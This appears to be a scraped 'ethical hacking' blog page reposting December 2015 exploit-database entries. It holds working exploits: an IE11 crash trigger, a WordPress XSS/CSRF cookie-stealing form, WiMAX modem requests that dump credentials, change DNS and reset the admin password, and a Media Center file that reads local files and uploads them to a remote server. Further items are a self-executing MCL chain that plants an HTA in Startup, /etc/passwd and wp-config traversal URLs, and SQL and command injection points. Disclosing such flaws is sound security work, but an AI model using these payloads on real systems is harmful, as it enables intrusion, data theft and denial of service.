<!doctype html>
<html>
<head>
<meta http-equiv='Cache-Control' content='no-cache'/>
<title>IE11 11.0.9600.18097 NULL PTR</title>
<script>
/*
* Exploit Title: IE 11 COmWindowProxy::SwitchMarkup NULL PTR
* Date: 09.12.2015
* Exploit Author: Marcin Ressel
* Vendor Homepage: www.microsoft.com
* Software Link: 0
* Version: 11.0.9600.18097
* Tested on: Windows 7 x64
* https://twitter.com/m_ressel
*/
var trg,src,arg;
function tk() {
targetDomTree = document.getElementsByTagName("*");
var meta = document.createElement('meta');
meta.setAttribute("http-equiv", "X-UA-Compatible");
meta.setAttribute("content",'IE=10');
document.getElementsByTagName("head")[0].appendChild(meta);
doc = document;
src = targetDomTree[8];
trg = targetDomTree[1];
arg = targetDomTree[0];
arg.addEventListener("DOMNodeRemoved",new Function("",
'try{src.runtimeStyle.textAlignLast="center";}catch(err){}'+
'try{trg = arg.removeNode(true);}catch(err){}'+
'try{trg.parentNode.style.textAutospace="ideograph-numeric";}catch(err){}'+
'try{trg.runtimeStyle="align-items:stretch;";}catch(err){}'+
'try{trg.insertAdjacentHTML("afterEnd","<table><tfoot>http://www.w3.org/2000/xmlns/</tfoot></table>");}catch(err){}'+
'try{trg.parentElement.parentNode.style.wordWrap="initial";}catch(err){}'+
'try{trg.parentNode.style.writingMode="vertical-rl";}catch(err){}'+
'try{doc.write("");}catch(err){}try{trg.style.whiteSpace="pre"; }catch(err){}'
),
true);
trg.outerText = new Object();
trg.parentNode.appendChild(document.createElement("div"));
}
</script>
</head>
<body onload='tk();'>
<div id="out">..</div>
<div id="oneUnArg">...</div>
<div id="pHolder"></div>
</body>
</html>
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863595270
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Exploit Title: WP Easy Poll 1.1.3 XSS and CSRF
Exploit Author : Ahn Sung Jun
Date : 2015-12-09
Vendor Homepage : https://wordpress.org/plugins/wp-easy-poll-afo/
Software Link : https://downloads.wordpress.org/plugin/wp-easy-poll-afo.1.1.3.zip
Version : 1.1.3
Tested On : kail linux Iceweasel
===========================================
Vulnerable Code : wp_easy_poll.php
if(isset($_REQUEST['action']) and $_REQUEST['action'] == 'p_add'){
global $wpdb;
$pc = new poll_class;
/* Line 859 */
$insert = array('p_ques' => $_REQUEST['p_ques'], 'p_author' => $_REQUEST['p_author'], 'p_start' => $_REQUEST['p_start'], 'p_end' => $_REQUEST['p_end'], 'p_added' => date("Y-m-d H:i:s"), 'p_status' => $_REQUEST['p_status']);
$wpdb->insert( $wpdb->prefix.$pc->table, $insert );
$new_poll_id = $wpdb->insert_id;
$p_anss = $_REQUEST['p_anss'];
if(is_array($p_anss) and $new_poll_id){
foreach($p_anss as $key => $value){
if($value != ''){
$insert1 = array('p_id' => $new_poll_id, 'a_ans' => $value, 'a_order' => $key+1);
$wpdb->insert( $wpdb->prefix.$pc->table2, $insert1 );
}
}
}
===========================================
POC (XSS & CSRF)
<html>
<body onload="javascript:document.forms[0].submit()">
<form name="f" action="http://192.168.0.8/wordpress/wp-admin/admin.php?page=easy_polls&action=add" method="post">
<input type="hidden" name="action" value="p_add" />
<input type="hidden" name="p_ques" value="<script>alert(document.cookie)</script>">
<input type="hidden" name="p_start" id="p_start" value="2015-11-18 22:55:52" required="required" />
<input type="hidden" name="p_end" id="p_end" value="2015-11-20 09:00:00" required="required"/>
<input type="submit" name="submit" value="Submit" class="button" />
</form>
</html>
===========================================
Secure Coding
if(isset($_REQUEST['action']) and $_REQUEST['action'] == 'p_add'){
global $wpdb;
$pc = new poll_class;
/* Secure Coding */
$_REQUEST['p_ques'] = str_replace("script", "x-script", $_REQUEST['p_ques']);
$_REQUEST['p_ques'] = str_replace("<", ">", $_REQUEST['p_ques']);
$_REQUEST['p_ques']= str_replace(">" ,"<", $_REQUEST['p_ques']);
$insert = array('p_ques' => $_REQUEST['p_ques'], 'p_author' => $_REQUEST['p_author'], 'p_start' => $_REQUEST['p_start'], 'p_end' => $_REQUEST['p_end'], 'p_added' => date("Y-m-d H:i:s"), 'p_status' => $_REQUEST['p_status']);
$wpdb->insert( $wpdb->prefix.$pc->table, $insert );
$new_poll_id = $wpdb->insert_id;
$p_anss = $_REQUEST['p_anss'];
if(is_array($p_anss) and $new_poll_id){
foreach($p_anss as $key => $value){
if($value != ''){
$insert1 = array('p_id' => $new_poll_id, 'a_ans' => $value, 'a_order' => $key+1);
$wpdb->insert( $wpdb->prefix.$pc->table2, $insert1 );
}
}
}
### Exploit Title: WIMAX MT711x - Multiple Vulnerabilities
### Date: ˝Friday, ˝December ˝11, ˝2015
### Exploit/Vulnerability Author: Alireza Azimzadeh Milani (alimp5)
### Vendor Homepage: http://www.seowonintech.co.kr/en/
### Version: V_3_11_14_9_CPE
### Tested on: Kali-Linux
I'm an ethical penetration tester and super moderator of Iran Security Team(http://irsecteam.org)
I have updated the modem to latest firmware which released by the company.
but with this work(upgrading the firmware); The attacker can bypass the authentication mechanism.
### Details of MT711x model:
Version Information:
Build Time 2014.08.18-11:49
CPE Ver 1.0.9
MTK FW Ver EX_REL_MT711x_V_3_11_14_9_CPE
Serial Number IRMB1351C9200-0001044
I used below tools to find the vulnerabilities:
1)BurpSuite - Free Edition 2)wget 3)Nmap
### POCs of the modem:
#Get the WIFI settings>>
wget -c "http://server/cgi-bin/multi_wifi.cgi"
#Get Wimax credentials>>
wget -c "http://server/cgi-bin/wccm_wimax_setting.cgi"
#Enable and Disable connections to modem (as default those are ENABLED)>>
http://server/cgi-bin/remote.cgi
#Ping a system (useful for launching (D)DOS attack)>>
POST /cgi-bin/diagnostic.cgi HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://server/cgi-bin/diagnostic.cgi
Cookie: login=; login=admin
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 158
select_mode_ping=on&ping_ipaddr=4.2.2.4&ping_count=10&trace_ipaddr=&trace_max_ttl=6&trace_qoeries_num=3&trace_report_only_hidden=0&action=Apply&html_view=ping
#Change the password of ADMIN account:
POST /cgi-bin/pw.cgi HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://server/cgi-bin/pw.cgi
Cookie: login=admin
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
isp_name=mobinnet&pw_set_select=admin&passPass=admin&passCfirm=admin&action=Apply
### Conclusion:
1)the attacker can read sensitive information and set it on his own modem. such: for using free internet.
2)Anyone who can send a packet to the modem for crashing/downgrading/DOS.
3)To obtain the control of similar modem(MT711x) in order to launching DOS or DDOS attacks on targets in WWW(world wide web).
At the end, I am thankful and I wait for your response.
### Exploit Title: WIMAX LX350P(WIXFMR-108) - Multiple Vulnerabilities
### Date: ˝Friday, ˝December ˝11, ˝2015
### Exploit/Vulnerability Author: Alireza Azimzadeh Milani (alimp5)
### Vendor Homepage: http://www.greenpacket.com
### Version: v2.10.14-g1.5.2
### Tested on: Kali-Linux
I'm an ethical penetration tester and super moderator of Iran Security Team(http://irsecteam.org)
I have updated the modem to latest firmware which released by the company.
but with this work(upgrading the firmware); The attacker can bypass the authentication mechanism.
### Details of LX350P model:
Device Information:
Hardware model: WIXFMR-108
Firmware version: v2.10.14-g1.5.2-mobinnet
Firmware version: v2.10.14-g1.5.2
Firmware creation date: Mon Aug 15 16:45:58 2013
Frequency range: 3300000KHz~3600000KHz
Serial number: DXHKC120702523
I used below tools to find the vulnerabilities:
1)BurpSuite - Free Edition 2)wget 3)Nmap
### POCs of the modem:
#Get wimax credentials>>
wget -c "http://server/ajax.cgi?action=tag_init_wimax_auth.php"
#Enable and Change DMZ_Host IP in Firewall(request manipulating with BurpSuie)>>
POST /ajax.cgi?action=net_firewall HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: Language=en; page=net_firewall.php
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 113
NETFILTER_FW_IPFILTER=&MGMT_WEB_WAN=on&MGMT_TELNET_WAN=on&NETFILTER_DMZ_HOST=8.8.8.8&btnSubmit=1
#Ping a system: (We can use from below query for launching (D)DOS attacks>>
http://server/ajax.cgi?action=tag_ipPing&pip=4.2.2.4&cache=false
http://server/ajax.cgi?action=tag_ipPing&pip=192.168.1.1&cache=false
http:/server/ajax.cgi?action=tag_ipPing&pip=192.168.1.1&cache=false
#Get info about WAN MAC, LAN MAC, DHCP + ... >>
http://server/ajax.cgi?action=tag_init_net_dhcp.php&cache=false
#Change the DNS IP Addresses (DNS Hijacking, Spoofing)>>
POST /ajax.cgi?action=net_dhcp HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: Language=en; page=net_dhcp.php
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 945
DHCPD_STATIC_LEASE=&DHCPD_ENABLE=1&DHCPD_START_IP_01=192&DHCPD_START_IP_02=168&DHCPD_START_IP_03=1&DHCPD_START_IP_04=2&DHCPD_START_IP=192.168.1.2&DHCPD_END_IP_01=192&DHCPD_END_IP_02=168&DHCPD_END_IP_03=1&DHCPD_END_IP_04=200&DHCPD_END_IP=192.168.1.200&dns_type_1=2&DNS_IP_1_01=6&DNS_IP_1_02=6&DNS_IP_1_03=6&DNS_IP_1_04=6&DNS_IP_1=6.6.6.6&dns_type_2=2&DNS_IP_2_01=8&DNS_IP_2_02=8&DNS_IP_2_03=8&DNS_IP_2_04=8&DNS_IP_2=8.8.8.8&dns_type_3=1&DNS_IP_3_01=0&DNS_IP_3_02=0&DNS_IP_3_03=0&DNS_IP_3_04=0&DNS_IP_3=&DHCPD_LEASE_TIME=1440&btnSubmit=1&DHCPD_DNS=2%2C6.6.6.6+2%2C8.8.8.8+1%2C0.0.0.0&ippt_enable=0&Active_0=Y&Interface_0=1&Protocol_0=1&SrcPort_0=68&DestPort_0=67&Comment_0=DHCP+request+from+lan&Active_1=Y&Interface_1=2&Protocol_1=1&SrcPort_1=67&DestPort_1=68&Comment_1=DHCP+response+from+wan&IPPT_EXCEPTION=1%2CY%2C1%2C1%2C68%2C67%2CDHCP+request+from+lan%3B2%2CY%2C2%2C1%2C67%2C68%2CDHCP+response+from+wan%3B&IPPT_EXCEPTION_NUM=2
#Frame Injection>>
http://server/ajax.cgi?action=<iframe src="http://r87.com/?"></iframe>&sid=DtTrEZnLke5Z&cache=false&time=1449547319726
http://server/ajax.cgi?action=<iframe src="http://r87.com/?"></iframe>&sid=DtTrEZnLke5Z&cache=false
http://server/ajax.cgi?action=<iframe src="http://r87.com/?"></iframe>cache=false
http://server/ajax.cgi?action=<iframe src="http://r87.com/?"></iframe>&time=3
### Conclusion:
1)the attacker can read sensitive information and set it on his own modem. such: for using free internet.
2)Anyone who can send a packet to the modem for crashing/downgrading/DOS.
3)An attacker might use "Frame Injection" to redirect users to other malicious websites that are used for phishing and similar attacks.
4)To obtain the control of similar modem(LX350P) in order to launching DOS or DDOS attacks on targets in WWW(world wide web).
At the end, I am thankful and I wait for your response.
1. Advisory Information
Title: Microsoft Windows Media Center link file incorrectly resolved reference
Advisory ID: CORE-2015-0014
Advisory URL: http://www.coresecurity.com/advisories/microsoft-windows-media-center-link-file-incorrectly-resolved-reference
Date published: 2015-12-08
Date of last update: 2015-12-04
Vendors contacted: Microsoft
Release mode: Coordinated release
2. Vulnerability Information
Class: Use of Incorrectly-Resolved Name or Reference [CWE-706]
Impact: Information leak
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2015-6127
3. Vulnerability Description
The 'application' tag in Microsoft [1] Windows Media Center link files (.mcl extension) can include a 'run' parameter, which indicates the path of a file to be launched when opening the MCL file, or a 'url' parameter, which indicates the URL of a web page to be loaded within the Media Center's embedded web browser.
A specially crafted MCL file having said 'url' parameter pointing to the MCL file itself can trick Windows Media Center into rendering the very same MCL file as a local HTML file within the Media Center's embedded web browser.
4. Vulnerable Packages
Windows 7 for x64-based Systems Service Pack 1 (with Internet Explorer 11 installed)
Other versions are probably affected too, but they were not checked.
5. Vendor Information, Solutions and Workarounds
Microsoft posted the following Security Bulletin: MS15-134 [2]
6. Credits
This vulnerability was discovered and researched by Francisco Falcon from Core Exploits Team. The publication of this advisory was coordinated by Joaquín Rodríguez Varela from the Core Advisories Team.
7. Technical Description / Proof of Concept Code
The ehexthost.exe binary, part of Windows Media Center, loads the given URL into an embedded instance of Internet Explorer running in the local machine zone, but it doesn't opt-in for the FEATURE_LOCALMACHINE_LOCKDOWN IE security feature, therefore this situation can be leveraged by an attacker to read and exfiltrate arbitrary files from a victim's local filesystem by convincing him to open a malicious MCL file.
The proof-of-concept shows an MCL file with embedded HTML + JS code, referencing itself in the 'url' parameter. Unlike what happens when loading a local HTML file into Internet Explorer 11, the JS code included here will automatically run with no prompts, and it will be able to read arbitrary local files using the MSXML2.XMLHTTP ActiveX object. Those read files then can be uploaded to an arbitrary remote web server.
Also note that, in order for the PoC to work, the value of the 'url' parameter must match the name of the MCL file.
7.1. Proof of Concept
A new file should be created with the name "poc-microsoft.mcl" and with the following content:
<application url="poc-microsoft.mcl"
name="Showcase"
bgcolor="RGB(255,255,255)"
sharedviewport="false">
<html>
<head>
<meta http-equiv="x-ua-compatible" content="IE=edge" >
</head>
<body>
<script type="text/javascript">
function do_upload(fname, data){
var xmlhttp = new XMLHttpRequest();
xmlhttp.open("POST", "http://192.168.1.50/uploadfile.php", true);
xmlhttp.setRequestHeader("Content-type", "multipart/form-data");
xmlhttp.setRequestHeader("Connection", "close");
xmlhttp.onreadystatechange = function(){if (xmlhttp.readyState == 4){alert(fname + " done.");}}
xmlhttp.send(new Uint8Array(data));
}
function read_local_file(filename){
/* Must use this one, XMLHttpRequest() doesn't allow to read local files */
var xmlhttp = new ActiveXObject("MSXML2.XMLHTTP");
xmlhttp.open("GET", filename, false);
xmlhttp.send();
return xmlhttp.responseBody.toArray();
}
function upload_file(filename){
try{
do_upload(filename, read_local_file(filename));
}catch(e){
alert(filename + " error: " + e);
}
}
upload_file("file:///C:/Windows/System32/calc.exe");
</script>
</body>
</html>
</application>
8. Report Timeline
2015-09-24: Core Security sent the first notification to Microsoft.
2015-09-24: Microsoft acknowledged receipt of the email and requested a draft version of the advisory.
2015-09-25: Core Security sent Microsoft the draft version of the advisory including a PoC.
2015-09-25: Microsoft cased the report under MSRC 31305.
2015-10-02: Core Security requested Microsoft provide a status update and confirmation of the reported bug.
2015-10-02: Microsoft informed Core Security that they were able to reproduce the issue. They were still reviewing it to determine if they would address it in a security release.
2015-10-07: Core Security requested Microsoft let us know once they made a decision.
2015-10-08: Microsoft informed Core Security they would keep us updated.
2015-10-26: Core Security asked Microsoft if there were any updates regarding the reported bug and if they had an estimated time of availability.
2015-10-27: Microsoft informed Core Security that they would be pursuing a fix for the reported issue and are working on a release date for it.
2015-11-05: Core Security asked Microsoft if they had determined a release date for the fix and a CVE ID to the reported vulnerability.
2015-11-10: Microsoft informed Core Security that they were targeting the security fix for this issue in their December release. They also informed us that they assigned CVE-2015-6127 to this case.
2015-11-11: Core Security thanked Microsoft for their reply and clarified that we would be publishing the advisory on Tuesday, the 8 of December, 2015.
2015-11-12: Microsoft requested from Core Security the link where the advisory would be published and the name of the researcher that should appear in the acknowledgment.
2015-11-13: Core Security informed Microsoft of the link and name that should appear in the acknowledgment.
2015-11-16: Microsoft informed Core Security that they updated the CVE acknowledgment accordingly.
2015-12-08: Advisory CORE-2015-0014 published.
9. References
[1] http://www.microsoft.com/.
[2] https://technet.microsoft.com/library/security/MS15-134.
10. About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
11. About Core Security
Core Security enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
12. Disclaimer
The contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
13. PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Title: Microsoft Windows Media Center Library Parsing RCE Vuln aka "self-executing" MCL file (CVE-2015-6131)
Software Vendor: Microsoft
Software version : MS Windows Media Center latest version on any Windows OS.
Software Vendor Homepage: http://www.microsoft.com
CVE: CVE-2015-6131
Exploit Author: Eduardo Braun Prado
Vulnerability oficial discoverer: Zhang YunHai of NSFOCUS Security Team
date: december 8, 2015
Vulnerability description:
Windows Media Center contains a remote code execution vulnerability because it allows "MCL" files to reference themselves as HTML pages, which will be parsed inside Windows Media Center window, in the context of the local machine security zone of Internet Explorer browser. This in turn allows execution of arbitrary code using eg. ADO ActiveX Objects. AKA "self-executing" MCL files.
exploit code below:
----------- self-exec-1.mcl ------------------------------------
<application url="self-exec1.mcl"/><html><script>alert(' I am running in local machine zone which allows arbitrary code execution via, for example, ADO Objects')</script></html>
------------------------------------------------------------
----------self-exec-2.mcl--------------------------------------
<application url="self-exec2.mcl"/><html><b>Use a sniffer software to sniff SMB traffic and retrieve the remote Windows username required for this exploit</b><img src=\\192.168.10.10\smbshare\someimg.jpg></img><script> RecordsetURL='http://192.168.10.10:80/recordsetfile.txt'; var rs = new ActiveXObject('ADODB.recordset'); rs.Open(RecordsetURL); rs.Save('C:/users/windowsuser/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/poc.hta'); rs.Close();
</script></html>
----------------------------------------------------------
-----Create-recordsetfile.hta --------------
<html><body onload="aa()">
<script language="VBScript">
function aa()
defdir="."
alert "This script will retrieve data from ""recordsetdata.txt"" and save it to the current directory as ""recordsetfile.txt"".
Set c = CreateObject("ADODB.Connection")
co = "Driver={Microsoft Text Driver (*.txt; *.csv)};DefaultDir=" & defdir & ";Extensions=txt;"
c.Open co
set rs =CreateObject("ADODB.Recordset")
rs.Open "SELECT * from recordsetdata.txt", c
al=rs.Save(defdir & "\recordsetfile.txt")
rs.close
end function
</script></body></html>
-------------------------------------------------------------------------------
---------recordsetdata.txt------------------------------------------
<html>
<script>a=new ActiveXObject('Wscript.Shell')</script>
<script>a.Run('calc.exe',1);</script>
</html>
-------------------------------------------------------------------
source: https://www.securityfocus.com/bid/64693/info
SPAMINA Cloud Email Firewall is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.
A remote attacker could exploit the vulnerability using directory-traversal characters ('../') to access arbitrary files that contain sensitive information. Information harvested may aid in launching further attacks.
SPAMINA Cloud Email Firewall 3.3.1.1 is vulnerable; other versions may also be affected.
https://www.example.com/?action=showHome&language=../../../../../../../../../../etc/passwd%00.jpg
https://www.example.com/multiadmin/js/lib/?action=../../../../../../../../../../etc/passwd&language=de
https://www.example.com/index.php?action=userLogin&language=../../../../../../../../../../etc/passwd.jpg
// source: https://www.securityfocus.com/bid/64626/info
VLC Media Player is prone to a denial-of-service vulnerability.
Successful exploits may allow attackers to crash the affected application, denying service to legitimate users.
VLC Media Player 1.1.11 is vulnerable; other versions may also be affected.
# Exploit Title: VLC v. 1.1.11 .eac3 DOS
# Date: 3/14/2012
# Author: Dan Fosco
# Vendor or Software Link: www.videolan.org
# Version: 1.1.11
# Category:: local
# Google dork: n/a
# Tested on: Windows XP SP3 (64-bit)
# Demo site: n/a
#include <stdio.h>
int main(int argc, char *argv[])
{
FILE *f;
f = fopen(argv[1], "r+");
fseek(f, 5, SEEK_SET);
fputc('\x00', f);
fclose(f);
return 0;
}
//code updates eac3 file, can find samples on videolan ftp server
# Title : GoAutoDial CE 3.3 Multiple SQL injections, Command Injection
# Date : 06/12/2015
# Author : R-73eN
# Tested on : goautodial-32bit-ce-3.3-final
# Software : http://goautodial.org/
# ___ __ ____ _ _
# |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | |
# | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | |
# | || | | | _| (_) | |_| | __/ | | | / ___ \| |___
# |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|
#
Vulnerabilities
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
call_report_export.php
Line 131
$LOGip = getenv("REMOTE_ADDR");
$LOGbrowser = getenv("HTTP_USER_AGENT");
$LOGscript_name = getenv("SCRIPT_NAME");
$LOGserver_name = getenv("SERVER_NAME");
$LOGserver_port = getenv("SERVER_PORT");
$LOGrequest_uri = getenv("REQUEST_URI");
$LOGhttp_referer = getenv("HTTP_REFERER");
if (preg_match("/443/i",$LOGserver_port)) {$HTTPprotocol = 'https://';}
else {$HTTPprotocol = 'http://';}
if (($LOGserver_port == '80') or ($LOGserver_port == '443') ) {$LOGserver_port='';}
else {$LOGserver_port = ":$LOGserver_port";}
$LOGfull_url = "$HTTPprotocol$LOGserver_name$LOGserver_port$LOGrequest_uri";
$stmt="INSERT INTO vicidial_report_log set event_date=NOW(), user='$PHP_AUTH_USER', ip_address='$LOGip', report_name='$report_name', browser='$LOGbrowser', referer='$LOGhttp_referer', notes='$LOGserver_name:$LOGserver_port $LOGscript_name |$campaign[0], $query_date, $end_date|', url='$LOGfull_url';";
The $LOGip , $LOGbrowser etc are not sanitized are passed directly to a sql query.
For example passing a crafted User-Agent header will cause a sql injection attack.
The following files were vulnerable for the same vulnerability.
call_report_export.php
voice_lab.php
user_status.php
user_stats.php
timeclock_status.php
timeclock_report.php
sph_report.php
group_hourly_stats.php
realtime_report.php
lead_report_export.php
list_download.php
fcstats.php
call_report_export.php
AST_VICIDIAL_ingrouplist.php
AST_VICIDIAL_hopperlist.php
AST_usergroup_login_report.php
AST_team_performance_detail.php
AST_VDADstats.php
AST_server_performance.php
campaign_debug.php
AST_LIST_UPDATEstats.php
AST_LISTS_campaign_stats.php
AST_OUTBOUNDsummary_interval.php
AST_IVRstats.php
AST_IVRfilter.php
AST_inbound_daily_report.php
and in many other files.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
web_form_forward.php
Line 15
if (isset($_GET["user"])) {$user=$_GET["user"];}
require("dbconnect.php");
$stmt="SELECT full_name from vicidial_users where user='$user';";
$rslt=mysql_query($stmt, $link);
$row=mysql_fetch_row($rslt);
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
QM_live_monitor.php
If the QueueMetrics is enabled the following file is vulnerable to sql injection
. LINE 31
if (isset($_GET["call"])){$call=$_GET["call"];}
elseif (isset($_POST["call"])) {$call=$_POST["call"];}
.
.
.
$stmt = "SELECT user,server_ip,conf_exten,comments FROM vicidial_live_agents where callerid='$call';";
As u can see the $call parameter is not sanitized which leads to Sql injection.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
call_log_display.php SQL injection
there is no validation on the $server_ip and $session_name an
if( (strlen($server_ip)<6) or (!isset($server_ip)) or ( (strlen($session_name)<12) or (!isset($session_name)) ) )
.
.
$stmt="SELECT count(*) from web_client_sessions where session_name='$session_name' and server_ip='$server_ip';";
.
.
The if statement can be bypassed very easily, we need to provide an input more then 6 characters and more then 12 characters.
Then the parameters get passed ot the sql query and we have sql injection again.
The same vulnerability was found to.
conf_extn_check.php
inbound_popup.php
live_extn_check.php
manager_send.php
park_calls_display.php
active_list_refresh.php
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
SCRIPT_multirecording_AJAX.php SQL injection
.
.
.
if (isset($_GET["campaign"])) {$campaign=$_GET["campaign"];}
elseif (isset($_POST["campaign"])) {$campaign=$_POST["campaign"];}
.
.
.
$stmt="select campaign_rec_filename from vicidial_campaigns where campaign_id='$campaign'";
Again $campaign is not sanetized
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
recording_lookup.php SQL injection
.
.
(isset($_GET["QUERY_recid"])) {$QUERY_recid=$_GET["QUERY_recid"];}
elseif (isset($_POST["QUERY_recid"])) {$QUERY_recid=$_POST["QUERY_recid"];}
.
.
$stmt="select recording_id,lead_id,user,filename,location,start_time,length_in_sec from recording_log where filename LIKE \"%$QUERY_recid%\" order by recording_id desc LIMIT 1;";
$QUERY_recid is not sanitized.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
vicidial_sales_viewer.php SQL injection , Command Injection
the $dcampaign parameter is not sanitized.
.
.
if (isset($_GET["dcampaign"])) {$dcampaign=$_GET["dcampaign"];}
elseif (isset($_POST["dcampaign"])) {$dcampaign=$_POST["dcampaign"];}
.
.
$stmt="select campaign_id, campaign_name from vicidial_campaigns where campaign_id='$dcampaign'"; // Here we have the sql injection
.
.
passthru("$WeBServeRRooT/vicidial/spreadsheet_sales_viewer.pl $list_ids $sales_number $timestamp $forc $now $dcampaign"); // Command injection
https://www.infogen.al/ - Infogen AL
// source: https://www.securityfocus.com/bid/64623/info
VLC Media Player is prone to a denial-of-service vulnerability.
Successful exploits may allow attackers to crash the affected application, denying service to legitimate users.
VLC Media Player 1.1.11 is vulnerable; other versions may also be affected.
# Exploit Title: VLC v. 1.1.11 .nsv DOS
# Date: 3/14/2012
# Author: Dan Fosco
# Vendor or Software Link: www.videolan.org
# Version: 1.1.11
# Category: local
# Google dork: n/a
# Tested on: Windows XP SP3 (64-bit)
# Demo site: n/a
#include <stdio.h>
int main()
{
FILE *f;
f = fopen("dos.nsv", "w");
fputs("\x4e\x53\x56\x66", f);
fputc('\x00', f);
fputc('\x00', f);
fputc('\x00', f);
fputc('\x00', f);
fclose(f);
return 0;
}
//use code for creating malicious file
edit: works on 2.0.1.0
source: https://www.securityfocus.com/bid/64619/info
xBoard is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts. This could allow the attacker to compromise the application and the computer; other attacks are also possible.
xBoard 5.0, 5.5, and 6.0 are vulnerable.
http://www.example.com/xboard/view.php?post=[LFI]
source: https://www.securityfocus.com/bid/64617/info
Apache Libcloud is prone to a local information-disclosure vulnerability.
Local attackers can exploit this issue to obtain sensitive information. Information obtained may lead to further attacks.
Apache Libcloud versions 0.12.3 through 0.13.2 are vulnerable.
dd if=/dev/vda bs=1M | strings -n 100 > out.txt
source: https://www.securityfocus.com/bid/64587/info
The Advanced Dewplayer plugin for WordPress is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.
Advanced Dewplayer 1.2 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php
source: https://www.securityfocus.com/bid/64572/info
CMS Afroditi is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
CMS Afroditi 1.0 is vulnerable.
http://www.example.com/default.asp?id=25 and 0<=(SELECT count(*) FROM [site]) and 1=1
Source: https://code.google.com/p/google-security-research/issues/detail?id=549
If the numFonts field in the TTC header is greater than (SIZE_MAX+1) / 4, an integer overflow occurs in filevirus_ttf() when calling CSafeGenFile::SafeLockBuffer.
The TTC file format is described here https://www.microsoft.com/typography/otspec/otff.htm
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38934.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=552
